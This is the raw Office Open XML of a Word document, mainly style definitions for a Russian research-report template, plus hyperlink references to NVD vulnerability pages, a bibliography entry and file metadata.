    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1ff1">
    <w:name w:val="1_Таблица с формулой_НИР"/>
    <w:basedOn w:val="1141"/>
    <w:next w:val="114"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:ind w:right="-539" w:firstLine="777"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1a">
    <w:name w:val="1_Название листинга_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="1fb"/>
    <w:uiPriority w:val="5"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="13"/>
      </w:numPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="240" w:after="60" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="123">
    <w:name w:val="Стиль таблицы_12_НИР"/>
    <w:basedOn w:val="ac"/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
    </w:pPr>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="28" w:type="dxa"/>
        <w:left w:w="28" w:type="dxa"/>
        <w:bottom w:w="28" w:type="dxa"/>
        <w:right w:w="28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/>
        <w:sz w:val="24"/>
      </w:rPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1ff2">
    <w:name w:val="1_Номер формулы_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="6"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:ind w:left="57"/>
      <w:jc w:val="right"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1142">
    <w:name w:val="1_Таблица_14ц_Формула_НИР"/>
    <w:basedOn w:val="1141"/>
    <w:uiPriority w:val="4"/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
      <w:bCs w:val="0"/>
      <w:iCs w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="115">
    <w:name w:val="1_Заголовок 1 Для приложений_НИР Знак"/>
    <w:basedOn w:val="1e"/>
    <w:link w:val="11"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="28"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1ff3">
    <w:name w:val="1_Сноска_НИР"/>
    <w:basedOn w:val="af6"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="11">
    <w:name w:val="1_Заголовок 1 Для приложений_НИР"/>
    <w:basedOn w:val="1d"/>
    <w:next w:val="114"/>
    <w:link w:val="115"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1ff4">
    <w:name w:val="1_Термины_Сокращения_НИР"/>
    <w:basedOn w:val="1f8"/>
    <w:next w:val="114"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00BF38E3"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="15">
    <w:name w:val="1_Название рисунка приложения _НИР"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="114"/>
    <w:uiPriority w:val="3"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af9">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="aff4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="709"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff4">
    <w:name w:val="Основной текст с отступом Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="af9"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="18">
    <w:name w:val="1_Название рисунка_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="114"/>
    <w:uiPriority w:val="3"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="13"/>
      </w:numPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="113">
    <w:name w:val="1_Заголовок 1_НИР Знак"/>
    <w:basedOn w:val="aff4"/>
    <w:link w:val="110"/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="122">
    <w:name w:val="1_Заголовок 2_НИР Знак"/>
    <w:basedOn w:val="aff4"/>
    <w:link w:val="120"/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:b/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="151">
    <w:name w:val="1_Заголовок 5_НИР Знак"/>
    <w:basedOn w:val="aff4"/>
    <w:link w:val="150"/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:snapToGrid w:val="0"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="10">
    <w:name w:val="1_Стиль нумерации_НИР"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="11"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="16">
    <w:name w:val="1_Название таблицы приложения_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="4"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="240" w:after="60" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="17">
    <w:name w:val="1_Название листинга приложения_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="1fb"/>
    <w:uiPriority w:val="5"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="120" w:after="60" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1143">
    <w:name w:val="1_Текст 14+курсив_НИР"/>
    <w:basedOn w:val="114"/>
    <w:next w:val="114"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a0">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="14"/>
      </w:numPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="709"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1C1">
    <w:name w:val="1_Cписок с вложенностью (уровень 1)_НИР"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="2"/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="15"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1C2">
    <w:name w:val="1_Cписок с вложенностью (уровень 2)_НИР"/>
    <w:basedOn w:val="1C1"/>
    <w:uiPriority w:val="2"/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1C3">
    <w:name w:val="1_Cписок с вложенностью (уровень 3)_НИР"/>
    <w:basedOn w:val="1C2"/>
    <w:uiPriority w:val="2"/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="160">
    <w:name w:val="1_Заголовок 6_НИР"/>
    <w:basedOn w:val="6"/>
    <w:next w:val="114"/>
    <w:link w:val="161"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="13"/>
      </w:numPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="240" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:right="0"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="161">
    <w:name w:val="1_Заголовок 6_НИР Знак"/>
    <w:basedOn w:val="aff4"/>
    <w:link w:val="160"/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:i/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1144">
    <w:name w:val="Стиль 1_Таблица_14ц_Формула_НИР + курсив"/>
    <w:basedOn w:val="1142"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1f0">
    <w:name w:val="Оглавление 1 Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="1f"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:bCs/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="23">
    <w:name w:val="Оглавление 2 Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="22"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:iCs/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="32">
    <w:name w:val="Оглавление 3 Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="31"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="42">
    <w:name w:val="Оглавление 4 Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="41"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="53">
    <w:name w:val="Оглавление 5 Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="52"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="61">
    <w:name w:val="Оглавление 6 Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="60"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="71">
    <w:name w:val="Оглавление 7 Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="70"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="80">
    <w:name w:val="Оглавление 8 Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="81"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="81">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:link w:val="80"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1985"/>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="90">
    <w:name w:val="Оглавление 9 Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="91"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="91">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:link w:val="90"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="2268"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="54">
    <w:name w:val="List 5"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:ind w:left="1415" w:right="284" w:hanging="283"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1ff5">
    <w:name w:val="1_Листинг_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="1fb"/>
    <w:uiPriority w:val="5"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepNext/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="240" w:after="60" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1ff6">
    <w:name w:val="1_Листинг приложения_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="1fb"/>
    <w:uiPriority w:val="5"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:keepNext/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="120" w:after="60" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1ff7">
    <w:name w:val="1_Утверждаю (должность год)_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="4820"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1ff8">
    <w:name w:val="1_Утверждаю ИО Фамилия_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="4820"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1ff9">
    <w:name w:val="1_Название работы_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:caps/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1ffa">
    <w:name w:val="1_Вид отчета этап_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1ffb">
    <w:name w:val="1_Номер книги_НИР"/>
    <w:basedOn w:val="1f2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00BF38E3"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1ffc">
    <w:name w:val="1_Руководитель исполнитель_НИР"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="112">
    <w:name w:val="1_Список_1._НИР"/>
    <w:basedOn w:val="114"/>
    <w:uiPriority w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00BF38E3"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="17"/>
      </w:numPr>
      <w:spacing w:before="60" w:after="60"/>
    </w:pPr>
    <w:rPr>
      <w:snapToGrid/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1ffd">
    <w:name w:val="1_Заполнитель строк на титуле_НИР"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00385F72"/>
  </w:style>
  <w:style w:type="character" w:styleId="aff5">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00E01062"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff6">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="006F72DC"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="font-claude-response-body">
    <w:name w:val="font-claude-response-body"/>
    <w:basedOn w:val="a1"/>
    <w:rsid w:val="00BA53F1"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aff7">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00BA53F1"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aff8">
    <w:name w:val="line number"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="000F2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nvd.nist.gov/vuln/detail/CVE-2026-7504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yperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9803" TargetMode="External"/><Relationship Id="rId33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hyperlink" Target="https://opentalk.local" TargetMode="Externa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31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hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9704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Fan06</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Guid>{0C820B98-8111-4076-93FF-327F7029B96B}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Fan, W., Wallace, L., Rich, S., Zhongju, Z.</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Tapping into the power of text mining</b:Title>
    <b:Year>2006</b:Year>
    <b:Publisher>Communications of the ACM / ACM</b:Publisher>
    <b:Pages>76-82</b:Pages>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{A5D706DE-7285-4098-90D2-EF866E856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4659</Words>
  <Characters>26560</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>221</Lines>
  <Paragraphs>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31157</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="54" baseType="variant">
      <vt:variant>
        <vt:i4>2359303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_Toc6670654</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2359303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_Toc6670653</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2359303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_Toc6670652</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2359303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_Toc6670651</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2359303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_Toc6670650</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2424839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_Toc6670649</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2424839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_Toc6670648</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2424839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_Toc6670647</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2424839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_Toc6670646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Алексей Качевский</dc:creator>
  <dc:description/>
  <cp:lastModifiedBy>Алексей Качевский</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <cp:lastPrinted>2021-02-02T12:10:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-08T11:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-08T12:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>